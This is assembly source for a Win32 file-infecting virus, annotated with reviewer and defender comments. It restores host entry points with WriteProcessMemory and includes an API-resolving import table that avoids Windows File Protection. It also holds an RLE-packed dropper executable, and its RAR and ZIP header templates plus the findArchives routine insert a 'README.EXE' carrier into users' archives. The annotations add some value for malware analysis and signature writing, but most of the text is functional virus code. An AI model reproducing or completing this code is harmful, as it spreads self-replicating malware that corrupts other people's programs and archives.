mov esi,[hostEP+ebp]
mov [esp+24h],esi ; put ret addr
call dword [_GetCurrentProcess+ebp] ; patch our process
lea edx,[padding+ebp]
push edx
push dword 5
sub edx,-4
push edx
push dword [hostEP+ebp]
push eax
call dword [_WriteProcessMemory+ebp]
or eax,eax
jz $ ; well... hehehe
; in fact it failed :P
; code modified by epo is restored
; just fly away
popfd
popad
ret
; get variables displacement
;-----------------------------------------------------------------------
; getDelta - compute the relocation delta of the running code
; Out:   ebp = (runtime address of _getDelta) - (assembled address of
;        _getDelta), i.e. the displacement this file adds to every data
;        label as [label+ebp]; zero only when the code runs exactly where
;        it was assembled.
; Clobb: flags
; How:   classic call/pop trick - `call` pushes the address of the very
;        next instruction (_getDelta), the inner `pop` retrieves it, and
;        the final `ret` uses getDelta's own return address, which is
;        now on top of the stack again.
;-----------------------------------------------------------------------
getDelta:
call _getDelta
_getDelta:
pop ebp ; ebp = runtime address of _getDelta
sub ebp,_getDelta ; minus its link-time address
ret
; does crc32 for self integrity check
;-----------------------------------------------------------------------
; CRC32 - bitwise (table-less) CRC-32, reflected polynomial EDB88320h,
;         initial value and final xor FFFFFFFFh - the same value
;         zlib/PKZIP produce. Used for the self-integrity check
;         (compare with myCRC32 below).
; In:    esi = start of buffer, edi = byte count (must be > 0, see NOTE)
; Out:   eax = crc32(buffer)
; Clobb: ecx, edx, flags; esi is advanced past the buffer and edi is
;        left at 0. ebx is preserved (pushed/popped here).
; Regs:  the running crc lives in dx:cx. Only the low halves matter:
;        the high halves start as FFFFh and are cleared by the final
;        `not`s. bx:ax accumulates the per-byte table value.
; NOTE(review): edi = 0 is not handled - `dec edi` wraps and the loop
;        runs ~4G times past the buffer. Callers must pass a length > 0.
;-----------------------------------------------------------------------
CRC32:
cld ; lodsb walks forward
xor ecx,ecx
dec ecx ; ecx = FFFFFFFFh = initial crc
mov edx,ecx
push ebx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb ; al = next input byte
xor al,cl ; al = byte ^ (crc & FFh) -> table index
mov cl,ch ; shift crc right by 8 across dx:cx ...
mov ch,dl
mov dl,dh
mov dh,8 ; ... dh doubles as the 8-bit counter; it ends at 0,
; which is exactly the top byte of (crc >> 8)
NextBitCRC:
shr bx,1 ; shift bx:ax right one bit, CF = bit shifted out
rcr ax,1
jnc NoCRC
xor ax,08320h ; bx:ax ^= EDB88320h (reflected CRC-32 polynomial)
xor bx,0EDB8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax ; crc = (crc >> 8) ^ table[(crc ^ byte) & FFh]
xor edx,ebx
dec edi ; bytes remaining; wraps if edi was 0 on entry
jnz NextByteCRC
pop ebx
not edx ; final xor; also zeroes the unused high halves
not ecx
mov eax,edx
rol eax,16 ; eax = dx:cx
mov ax,cx
ret
%include "infectpe.inc"
%include "findf.inc"
%include "hooks.inc"
%include "archive.inc"
; our import table
; runtime import table, walked by the API-resolving code (not in this
; view). Entry layout: one length byte (= distance to the next entry),
; a dword slot that receives the resolved address, then the
; NUL-terminated export name. The slots are called indirectly elsewhere
; in this file as `call dword [_Name+ebp]`.
; NOTE(review): API18 has length 0 although a WriteFile entry follows
; it; whether the resolver still processes that last entry depends on
; where it tests the length byte - confirm against the resolver loop.
; Defender note: this name set (WriteProcessMemory against its own
; process - see the GetCurrentProcess/WriteProcessMemory pair above -
; CreateFileMappingA/MapViewOfFile, FindFirst/NextFileA, Get/SetFileTime,
; GetVolumeInformationA) is a usable static signature. Naming is
; inconsistent: most name labels end in "str", the last four in "s".
API0 db API1-API0
_GetFileAttributesA dd 0
GetFileAttributesAstr db "GetFileAttributesA",0
API1 db API2-API1
_SetFileAttributesA dd 0
SetFileAttributesAstr db "SetFileAttributesA",0
API2 db API3-API2
_CreateFileA dd 0
CreateFileAstr db "CreateFileA",0
API3 db API4-API3
_GetFileSize dd 0
GetFileSizestr db "GetFileSize",0
API4 db API5-API4
_GetFileTime dd 0
GetFileTimestr db "GetFileTime",0
API5 db API6-API5
_CreateFileMappingA dd 0
CreateFileMappingAstr db "CreateFileMappingA",0
API6 db API7-API6
_MapViewOfFile dd 0
MapViewOfFilestr db "MapViewOfFile",0
API7 db API8-API7
_UnmapViewOfFile dd 0
UnmapViewOfFilestr db "UnmapViewOfFile",0
API8 db API9-API8
_CloseHandle dd 0
CloseHandlestr db "CloseHandle",0
API9 db APIa-API9
_SetFileTime dd 0
SetFileTimestr db "SetFileTime",0
APIa db APIb-APIa
_GetCurrentProcess dd 0
GetCurrentProcessstr db "GetCurrentProcess",0
APIb db APIc-APIb
_WriteProcessMemory dd 0
WriteProcessMemorystr db "WriteProcessMemory",0
APIc db APId-APIc
_LoadLibraryA dd 0
LoadLibraryAstr db "LoadLibraryA",0
APId db APIe-APId
_FreeLibrary dd 0
FreeLibrarystr db "FreeLibrary",0
APIe db APIf-APIe
_FindFirstFileA dd 0
FindFirstFileAstr db "FindFirstFileA",0
APIf db API10-APIf
_FindNextFileA dd 0
FindNextFileAstr db "FindNextFileA",0
API10 db API11-API10
_FindClose dd 0
FindClosestr db "FindClose",0
API11 db API12-API11
_SetCurrentDirectoryA dd 0
SetCurrentDirectoryAstr db "SetCurrentDirectoryA",0
API12 db API13-API12
_GetCurrentDirectoryA dd 0
GetCurrentDirectoryAstr db "GetCurrentDirectoryA",0
API13 db API14-API13
_GetWindowsDirectoryA dd 0
GetWindowsDirectoryAstr db "GetWindowsDirectoryA",0
API14 db API15-API14
_GetLastError dd 0
GetLastErrorstr db "GetLastError",0
API15 db API16-API15
_GetVolumeInformationA dd 0
GetVolumeInformationAs db "GetVolumeInformationA",0
API16 db API17-API16
_MultiByteToWideChar dd 0
MultiByteToWideChars db "MultiByteToWideChar",0
API17 db API18-API17
_GetFullPathNameW dd 0
GetFullPathNameWs db "GetFullPathNameW",0
API18 db 0 ; length 0 = end-of-table marker (see NOTE above)
_WriteFile dd 0
WriteFiles db "WriteFile",0
; names resolved outside the length-prefixed table above:
; GetProcAddress itself (looked up by name, length GetProcAddresslen),
; then two DLLs with one export each - SFC!SfcIsFileProtected (Windows
; File Protection check) and IMAGEHLP!CheckSumMappedFile (PE checksum).
; _sfcdll / _imagehlpdll look like module-handle slots, presumably
; filled via _LoadLibraryA; the loading code is not in this view.
GetProcAddress db "GetProcAddress",0
GetProcAddresslen equ $-GetProcAddress ; includes the NUL
_GetProcAddress dd 0 ; resolved address slot
_sfcdll dd 0 ; module handle slot (assumed)
sfcdll db "SFC",0
_SfcIsFileProtected dd 0
SfcIsFileProtected db "SfcIsFileProtected",0
_imagehlpdll dd 0 ; module handle slot (assumed)
imagehlpdll db "IMAGEHLP",0
_CheckSumMappedFile dd 0
CheckSumMappedFile db "CheckSumMappedFile",0
fmask: db "*.EXE",0 ; FindFirstFileA mask for infection targets
dropName: ; aliases the drive/serialNum bytes below; its use is not in this view
drive db 'c:\' ; root path passed to GetVolumeInformationA
serialNum db 0,0,0,0,0 ; 4-byte volume serial + NUL (assumed)
baseAddr dd 0
; Generated RLE compressed data
; RLE-packed dropper image, expanded into dropExp (bss, below).
; Encoding, verified by decoding the first bytes: a count byte c < 80h
; is followed by c literal bytes; c >= 80h is followed by ONE byte that
; is repeated (c-80h) times (so 0ffh,000h = 127 zero bytes).
; Decoded, the image starts with an MZ header (e_lfanew = 70h) and the
; usual "This program requires Win32" DOS stub, then a "PE" header for
; i386 (machine 014ch, 4 sections, timestamp 3d64e27ah); the literal
; runs also spell out ".text", "kernel32.dll" and "ExitProcess".
; NOTE(review): the code bytes visible (050h,0e8h = push eax / call,
; and 0ffh,025h = jmp dword [..]) suggest a minimal do-nothing EXE, i.e.
; the "README.EXE" carrier named in the RAR/ZIP templates below -
; confirm by decompressing.
drop db 005h,04dh,05ah,06ch,000h,001h,083h,000h,004h,004h ; "MZ" header
db 000h,011h,000h,082h,0ffh,001h,003h,082h,000h,001h
db 001h,086h,000h,001h,040h,0a3h,000h,001h,070h,083h ; 070h = e_lfanew
db 000h,02ch,00eh,01fh,0bah,00eh,000h,0b4h,009h,0cdh ; DOS stub code
db 021h,0b8h,000h,04ch,0cdh,021h,054h,068h,069h,073h ; "This
db 020h,070h,072h,06fh,067h,072h,061h,06dh,020h,072h ;  program r
db 065h,071h,075h,069h,072h,065h,073h,020h,057h,069h ;  equires Wi
db 06eh,033h,032h,00dh,00ah,024h,084h,000h,002h,050h ;  n32\r\n$" then "P
db 045h,082h,000h,008h,04ch,001h,004h,000h,07ah,0e2h ;  E", machine 014ch
db 064h,03dh,088h,000h,006h,0e0h,000h,002h,001h,00bh
db 001h,08fh,000h,001h,010h,08ch,000h,001h,040h,082h
db 000h,001h,010h,083h,000h,001h,002h,082h,000h,001h
db 001h,087h,000h,001h,004h,088h,000h,001h,050h,083h
db 000h,001h,004h,086h,000h,001h,002h,085h,000h,001h
db 010h,082h,000h,001h,010h,084h,000h,001h,010h,082h
db 000h,001h,010h,086h,000h,001h,010h,08ch,000h,001h
db 030h,082h,000h,001h,056h,09ch,000h,001h,040h,082h
db 000h,001h,00ah,0d3h,000h,005h,02eh,074h,065h,078h ; ".tex
db 074h,084h,000h,001h,010h,083h,000h,001h,010h,082h ;  t" section header
db 000h,001h,006h,084h,000h,001h,004h,08eh,000h,001h
db 020h,082h,000h,008h,060h,049h,04dh,050h,04fh,052h
db 054h,053h,082h,000h,001h,010h,083h,000h,001h,020h
db 082h,000h,001h,006h,084h,000h,001h,006h,08eh,000h
db 001h,060h,082h,000h,008h,060h,069h,06dh,070h,06fh
db 072h,074h,073h,082h,000h,001h,010h,083h,000h,001h
db 030h,082h,000h,001h,056h,084h,000h,001h,008h,08eh
db 000h,001h,040h,082h,000h,007h,050h,072h,065h,06ch
db 06fh,063h,073h,083h,000h,001h,010h,083h,000h,001h
db 040h,082h,000h,001h,00ah,084h,000h,001h,00ah,08eh
db 000h,001h,040h,082h,000h,001h,052h,0ffh,000h,0ffh
db 000h,0ffh,000h,0fbh,000h,004h,050h,0e8h,0fah,00fh ; push eax / call
db 0ffh,000h,0ffh,000h,0ffh,000h,0ffh,000h,005h,0ffh
db 025h,040h,030h,040h,0ffh,000h,0ffh,000h,0ffh,000h ; jmp dword [..]
db 0feh,000h,002h,038h,030h,08ah,000h,002h,028h,030h
db 082h,000h,002h,040h,030h,096h,000h,00ah,06bh,065h ; "ke
db 072h,06eh,065h,06ch,033h,032h,02eh,064h,082h,06ch ;  rnel32.dll"
db 084h,000h,002h,048h,030h,086h,000h,002h,048h,030h
db 088h,000h,009h,045h,078h,069h,074h,050h,072h,06fh ; "ExitPro
db 063h,065h,082h,073h,0ffh,000h,0ffh,000h,0ffh,000h ;  cess"
db 0afh,000h,001h,020h,082h,000h,001h,00ah,083h,000h
db 002h,002h,030h
; These headers are courtesy of Int13h (or star0?)
; RAR 2.x file-header template for the "README.EXE" entry appended to
; archives. The zero fields (header CRC, sizes, time/date, data CRC)
; are presumably filled in at infection time by archive.inc code that
; is not in this view.
; Defender note: an archive whose trailing file header is a stored
; (method 30h) "README.EXE" with attribute 20h matches this template.
RARHeader: ; Header that we will add
RARHeaderCRC dw 0 ; to fill: per the RAR format, low 16 bits of the CRC-32 of the header from RARType onward
RARType db 074h ; block type 74h = file header
RARFlags dw 8000h ; LONG_BLOCK: packed data follows the header
RARHeadsize dw FinRARHeader-RARHeader ; header length incl. file name
RARCompressed dd 0 ; packed size; equals the original size ...
RAROriginal dd 0 ; ... because the entry is stored, not compressed
RAROs db 0 ; host OS: 0 = MS-DOS
RARCrc32 dd 0 ; CRC-32 of the file data, to fill
RARFileTime db 0,0 ; DOS time of the dropped file
RARFileDate db 0,0 ; DOS date of the dropped file
RARNeedVer db 014h ; 20 decimal = needs unpacker version 2.0
RARMethod db 030h ; 30h = storing (no compression)
RARFnameSize dw FinRARHeader-RARName ; 10
RARAttrib dd 20h ; file attributes: archive bit
RARName db "README.EXE" ; name of the file to drop
FinRARHeader:
; This header is courtesy of star0
; ZIP local file header + central directory entry templates for the
; "README.EXE" entry. The zero fields (time/date, CRC-32, sizes,
; local-header offset) are presumably filled in at infection time by
; archive.inc code that is not in this view. The end-of-central-directory
; record (50h,4bh,05,06) is not part of this template.
; Defender note: a stored (method 0) "README.EXE" entry with external
; attribute 20h and internal attribute 1 matches this template.
LocalHeader:
ZIPlogsig: db 50h,4bh,03,04 ; "PK\3\4" local file header signature
ZIPver: dw 0ah ; version needed to extract: 1.0
ZIPgenflag: dw 0 ; general purpose flags: none (no encryption)
ZIPMthd: dw 0 ; method 0 = stored
ZIPTime: dw 0 ; DOS time, to fill
ZIPDate: dw 0 ; DOS date, to fill
ZIPCrc: dd 0 ; CRC-32 of the data, to fill
ZIPSize: dd 0 ; compressed size, to fill
ZIPUncmp: dd 0 ; uncompressed size, to fill (same value: stored)
ZIPFnln: dw 10 ; file name length = len("README.EXE")
ZIPXtraLn: dw 0 ; extra field length
ZIPfileName: db "README.EXE"
CentralHeader:
ZIPCenSig: db 50h,4bh,01,02 ; "PK\1\2" central directory signature
ZIPCver: db 0 ; version made by: spec version byte
ZIPCos: db 0 ; version made by: host OS byte, 0 = MS-DOS/FAT
ZIPCvxt: db 0 ; version needed to extract, low byte (0 here vs 0ah in the local header)
ZIPCeXos: db 0 ; version needed to extract, high byte
ZIPCflg: dw 0 ; general purpose flags: no encryption
ZIPCmthd: dw 0 ; method 0 = stored
ZIPCtim: dw 0 ; last mod time, to fill
ZIPCDat: dw 0 ; last mod date, to fill
ZIPCCrc: dd 0 ; CRC-32, to fill
ZIPCsiz: dd 0 ; compressed size, to fill
ZIPCunc: dd 0 ; uncompressed size, to fill
ZIPCfnl: dw 10 ; file name length
ZIPCxtl: dw 0 ; extra field length 0
ZIPCcml: dw 0 ; file comment length 0
ZIPDsk: dw 0 ; disk number start 0
ZIPInt: dw 1 ; internal attributes (bit 0 = ASCII/text; unusual for an EXE)
ZIPExt: dd 20h ; external attributes: DOS archive bit
ZIPOfst: dd 0 ; offset of the local header, to fill
ZIPCfileName: db "README.EXE"
EndOfCentral: ; end of the template, not an EOCD record
; used at infection stage
; first-generation values for the startUp block below (same 13-byte
; layout: 5 saved entry-point bytes, host entry point, relocation base).
; hostEPTMP points at fakeHost, so a first-generation run simply exits;
; relocTMP is vBegin (defined before this view). How and when these 13
; bytes are copied over startUp is not in this view.
infectTMP:
epobuffTMP dd 0 ; 5 bytes (dd + db): original host entry-point bytes
db 0
hostEPTMP dd fakeHost
relocTMP dd vBegin
infectTMPlen equ $-infectTMP ; = 13
myCRC32 dd 0 ; presumably the expected CRC32 of the body for the self-check
vEnd equ $ ; end of the part that is written into infected files
vSize equ (vEnd-vBegin)
; bss data not included into infected files (that's virtual memory)
; uninitialised working storage. It lies past vEnd, so it is not written
; into infected files and exists only in memory (viSize = in-memory size).
path0 times 260 db 0 ; 260 = MAX_PATH
path1 times 260 db 0
dropExp times 2570 db 0 ; buffer the RLE-packed dropper (drop) is
; expanded into
address dd 0
names dd 0
ordinals dd 0
mutexHnd dd 0
finddata: ; WIN32_FIND_DATAA, passed to FindFirstFileA/FindNextFileA
dwFileAttributes dd 0
dwLowDateTime0 dd 0 ; ftCreationTime
dwHigDateTime0 dd 0
dwLowDateTime1 dd 0 ; ftLastAccessTime
dwHigDateTime1 dd 0
dwLowDateTime2 dd 0 ; ftLastWriteTime
dwHigDateTime2 dd 0
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved dd 0,0
cFileName times 260 db 0
cAlternateFilename times 16 db 0 ; the Win32 field is 14 bytes; 2 spare
; for sfc shit (SfcIsFileProtected takes a wide-char path)
wideBuffer times 260*2 db 0 ; 260 wide chars
wideBuffer2 times 260*2 db 0
dummy dd 0
findHnd dd 0 ; search handle from FindFirstFileA
chksum dd 0,0 ; two dwords, matching CheckSumMappedFile's HeaderSum/CheckSum out-params (assumed)
fHnd dd 0
mapMem dd 0
fhmap dd 0
fileTime0 dd 0,0 ; three FILETIMEs, as GetFileTime/SetFileTime take (assumed)
fileTime1 dd 0,0
fileTime2 dd 0,0
fileAttrib dd 0
fileSize dd 0
padding dd 0 ; must stay adjacent to startUp: the WriteProcessMemory call above passes padding as lpNumberOfBytesWritten and padding+4 (= epobuff) as the 5-byte source buffer
startUp: ; same 13-byte layout as infectTMP
epobuff dd 0 ; 5 bytes (dd + db): saved host entry-point bytes
db 0
hostEP dd 0 ; host entry point; the code above stores it at [esp+24h] so the final ret lands there
reloc dd 0
viEnd equ $
viSize equ (viEnd-vBegin)
; stand-in "host" for the first generation: hostEPTMP points here, so
; returning to the host just terminates the process.
; ExitProcess is referenced without the +ebp delta and is defined
; outside this view (presumably a fixed import of the carrier).
fakeHost:
push dword 0 ; uExitCode = 0
call ExitProcess
; - main.asm EOF -
; - archive.inc BOF -
fgenmask db "*.*",0 ; FindFirstFileA mask used by findArchives (every file; the extension is checked afterwards)
;
; Look for archives to add our virus to
;
findArchives:
call dropTheVirus ; drop the virus
lea eax,[finddata+ebp]
push eax
lea eax,[fgenmask+ebp]
push eax
call dword [_FindFirstFileA+ebp]
inc eax
jz near notFoundArchive
dec eax
mov dword [findHnd+ebp],eax
findNextArchive:
mov eax,dword [nFileSizeLow+ebp] ; avoid small
cmp eax,2000h ; 8 kbs
jb near skipThisArchive
cmp eax,400000h*2 ; avoid huge (top 4 mbs)
ja near skipThisArchive
lea esi,[cFileName+ebp]
push esi
UCaseLoopArc:
cmp byte [esi],'a'
jb notUCaseArc
cmp byte [esi],'z'
ja notUCaseArc
sub byte [esi],'a'-'A'
notUCaseArc:
lodsb
or al,al
jnz UCaseLoopArc
mov eax,[esi-5]
pop esi
not eax
cmp eax,~".RAR"
jne nextArc0
call infectRAR
jmp skipThisArchive
nextArc0:
cmp eax,~".ZIP"
jne nextArc1
call infectZIP
jmp skipThisArchive
nextArc1:
skipThisArchive:
lea eax,[finddata+ebp]
push eax
push dword [findHnd+ebp]
call dword [_FindNextFileA+ebp]
or eax,eax
jnz near findNextArchive
push dword [findHnd+ebp]
call dword [_FindClose+ebp]
notFoundArchive: